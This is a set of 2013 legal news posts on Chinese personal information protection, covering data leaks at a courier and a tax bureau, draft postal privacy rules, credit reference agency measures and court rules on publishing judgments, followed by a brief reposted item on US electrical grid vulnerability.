A spokesperson for YTO Express said in October 2013 that it was investigating the case and promised to crack down on the information theft. It has since been verified that the personal information sold included customer names, addresses, telephone numbers and transaction serial numbers. Armed with this information, unscrupulous online retailers can forge customer records, while other businesses can use the information to contact potential customers. Since the incident, YTO Express has reportedly taken emergency measures to reduce security risks, and has begun to conduct a comprehensive internal investigation to search for the source of the improper disclosure of personal information. YTO Express is also reportedly working with its information technology partners to enhance the security of express delivery information.

Arrest of Three Men in Illegal Sales of Millions of Items of Personal Information

An employee at a local taxation bureau in Wuhan took advantage of his position to secretly copy personal information from the local taxation bureau’s intranet onto a USB memory drive. The employee then sold the information to another person via QQ, an instant messaging software, for an illegal profit of over RMB 100,000. The purchaser then resold the information to a third person. All three men were arrested for illegally obtaining personal information.

State Post Bureau of China Releases Draft Normative Rules Involving Personal Information Protection for Public Comment

On November 27, 2013, the State Post Bureau of the People’s Republic of China (the “SPBC”) released five draft normative rules for solicitation of public comment. Three of these rules, respectively entitled Provisions on the Management of the Security of Personal Information of Postal and Delivery Service Users (the “Draft Provisions”), Provisions on the Reporting and Handling of Security Information in the Postal Sector (the “Reporting and Handling Provisions”), and Provisions on the Management of Undeliverable Express Mail Items (the “Management Provisions”) contain significant requirements regarding the protection of personal information. The deadline for submitting comments on the rules is December 27, 2013.

Provisions on the Management of the Security of Personal Information of Postal and Delivery Service Users

The Draft Provisions were formulated in accordance with the Postal Law of the People’s Republic of China, the Measures for the Supervision and Administration of Security of the Postal Industry, and other relevant laws and regulations. The purposes of the Draft Provisions are to (1) strengthen the management of the security of users’ personal information in postal and delivery services, (2) protect the legitimate rights and interests of postal and delivery service users, (3) maintain the safety of postal correspondence and information, and (4) promote the sound development of the postal industry. The Draft Provisions apply to the supervision, administration, operation and use of postal and delivery services in China which involve the security of users’ personal information.

The Draft Provisions first define “personal information of postal and delivery service users” (the “Users’ Information”) as information used in the course of postal and delivery services. These include the name, address, ID number, telephone number and company name of the sender (and of the recipient), and the order number, delivery time and item details.

Second, the Draft Provisions set forth a number of general requirements for the protection of Users’ Information. These include:

  • Franchised express delivery enterprises must agree to clauses in the franchise agreement which establish safeguards for Users’ Information and specify security responsibilities of the franchisee and franchisor. When a franchisor incurs an information security incident, the franchisee must be required to undertake responsibilities of its own for the incident response;
  • A postal or express delivery enterprise must sign a confidentiality agreement with its operational staff to clarify confidentiality obligations in relation to Users’ Information, and must provide continuing training and education to develop the knowledge and skills of its operational staff with respect to the security of Users’ Information;
  • A postal or express delivery enterprise must establish a mechanism for handling complaints relating to the security of Users’ Information;
  • Whenever a postal or express delivery enterprise is engaged by operators (such as e-commerce operators and TV shopping operators) to provide delivery services, the agreement between the parties must include security clauses for the protection of Users’ Information, which specify the scope of information use, security protection measures for information exchanges and allocation of responsibilities in the event of information security incidents;
  • When entrusting a third party to input Users’ Information, a postal or express delivery enterprise must ensure that the third party is qualified to undertake information security safeguards, and must bear responsibility for information security incidents caused by the third party; and
  • No postal or express delivery enterprise, or operational staff thereof, may transfer any Users’ Information to any third party without express authorization under law, or without the users’ written consent.

Third, in addition to the foregoing requirements above, postal or express delivery enterprises are required to strengthen the management of the security of physical and electronic information appearing on the waybill, for example:

  • A postal or express delivery enterprise must strengthen the management of its business and processing locations and physically isolate the user service area from the mail (or express mail) processing and storage sites. To prevent the physical information from being stolen or leaked, non-staff must be strictly forbidden from entering such sites or reading over mail items (or express mails).
  • To prevent malicious code from destroying information systems and networks, and to avoid disclosure or alteration of information, postal and express delivery enterprises must install necessary antivirus software and hardware, set up measures to encrypt the delivery of Users’ Information through public networks, and strengthen their management of system passwords and of the security of electronic Users’ Information storage.

Finally, violations of the Draft Provisions may result in penalties including administrative warnings, fines and (under certain circumstances) even criminal liability.

Provisions on the Reporting and Handling of Security Information in the Postal Sector

The Reporting and Handling Provisions define “security information which should be reported and handled” as emergency and operational information relating to the security of the daily processes of postal or express delivery enterprises. The Reporting and Handling Provisions apply to the reporting and handling of this security information by postal or express delivery enterprises, or by postal administration authorities.

Under the Reporting and Handling Provisions, when Users’ Information has been illegally disclosed, postal or express delivery enterprises are required to report security information without delay to their local postal administration authorities and public security departments. If more than 500 items of Users’ Information have been illegally disclosed, local authorities must report the incident to the provincial postal administration authorities within two hours after they receive the report.

Provisions on the Management of Undeliverable Express Mail Items

The Management Provisions are intended to promote the freedom and privacy of correspondence and to protect the legitimate rights and interests of express delivery clients and their correspondents. The Management Provisions emphasize that, at times when undeliverable express items are held in custody and are being processed, no express delivery information may be misappropriated or illegally provided to others.

Conclusion

The three draft rules contain specific provisions on the protection of personal information in the postal industry. Once promulgated, the rules will have nationwide effect. The promulgation of these rules will likely alleviate problems arising from the misappropriation of personal information that is used in postal and express delivery services. In light of the emergence of markets that trade in personal information in a variety of fields, however, imposing regulations on the handling of personal information solely in the postal sector is insufficient and regulation of other sectors where opportunities to sell personal information is needed. Until an integrated, national Personal Data Protection Act that governs the handling of data protection in all industry sectors is adopted, markets for trading in personal information in China are likely to persist.

Read our previous coverage on Chinese personal information protection issues.

People’s Bank of China Issues Administrative Measures for Credit Reference Agencies

On November 15, 2013, the People’s Bank of China (the “PBOC”) issued its Administrative Measures for Credit Reference Agencies (the “Measures”) – eight months after the Administrative Regulations on the Credit Information Collection Sector (the “Regulations”) became effective on March 15, 2013. The Measures, which will take effect on December 20, 2013, were formulated to enhance the supervision and regulation of credit reference agencies and to promote positive developments in the credit information services sector.

The Measures are intended to complement the Regulations, which established a series of rules for the collection, use, processing, disclosure and transfer of personal information by credit reference agencies. The Measures provide more detail, by clarifying and specifying rules for the establishment of credit reference agencies that deal with the personal credit information of individuals (“personal credit reference agencies”). The Measures require a personal credit reference agency to first apply for pre-approval for a License for Personal Credit Reference Business from the PBOC before the agency may incorporate. In contrast, credit reference agencies that deal with enterprises’ credit information may be incorporated first, and then file with the relevant local PBOC counterpart. The Measures also require the personal credit reference agency to comply with a set of technical information security standards with respect to their credit reference business, and undergo regular assessments by a third-party institution that is qualified to assess information security safeguards.

Also pursuant to the Measures, a credit reference agency may be subject to enhanced surveillance by the PBOC (or its local counterpart) under certain circumstances, such as when the agency (1) is involved in a serious data breach incident, (2) shows signs of a possible data leakage, (3) is having major financial difficulties, (4) has been the subject of numerous complaints, or (5) has failed to comply with its reporting and appraisal obligations.

The implementation of these detailed rules for establishing and running personal credit reference agencies (and other compliance requirements) offer yet another example of increased attention to personal information protection issues by the Chinese government.

Read our previous coverage on Chinese personal information protection issues, including our post on the Supreme People’s Court of China passing of the Provisions on the Online Issuance of Judgment Documents by People’s Courts.

China’s Supreme People’s Court Releases Provisions on the Online Issuance of Judgment Documents by People’s Courts

On November 21, 2013, the Supreme People’s Court of China passed the Provisions on the Online Issuance of Judgment Documents by People’s Courts (the “Provisions”), which will take effect on January 1, 2014. The Provisions replace earlier rules (of the same title) enacted by the Supreme People’s Court on November 8, 2010, and generally focus on improved implementation of the principles of standardizing the online issuance of judgment documents, promoting judicial justice and enhancing the public credibility of the judiciary.

The Provisions also contain a number of suggestions for the protection of personal information. These recommendations indicate that:

  • Judgment documents involving state secrets, personal private matters or cases involving juvenile delinquency shall not be published on the Internet.
  • When issuing online judgment documents, a People’s Court shall delete the following information: (1) the home address, contact information, ID number, bank account number and any other personal information of a natural person; (2) relevant information of a juvenile; (3) the bank account number of an entity or other organizations; (4) business secrets; and (5) other content inappropriate for release on the Internet.
  • A People’s Court shall retain the real information of the name or title of the party concerned upon issuing online judgment documents, but the names of the following parties or litigants shall be processed anonymously through the use of alternate symbols: (1) the parties and their statutory agents in marriage and family cases or inheritance disputes; (2) victims and their statutory agents, witnesses and expert witnesses in criminal cases; (3) any defendant who is sentenced to fixed-term imprisonment of not more than three years and is exempted from criminal punishment (and who is not a recidivist or habitual offender).

The Provisions are intended to make the judicial system more independent and more transparent. At the same time, it remains to be seen how easily searchable the judgment opinion network will be after the Provisions are implemented. The Provisions represent the latest step in the ever-growing array of sector-specific regulations governing personal information in China, and may suggest that legislative and regulatory activities for the protection of personal information will continue.

The U.S. Electrical Grid More Vulnerable Than Ever

The U.S. electrical grid is more vulnerable today than it has ever been. Cyber attacks have the potential to disrupt large segments of the electrical grid, and top experts confirm that the U.S. is not prepared for this risk. Watch the 60 Minutes Video.

 

The post The U.S. Electrical Grid More Vulnerable Than Ever appeared first on Quick Start Survival.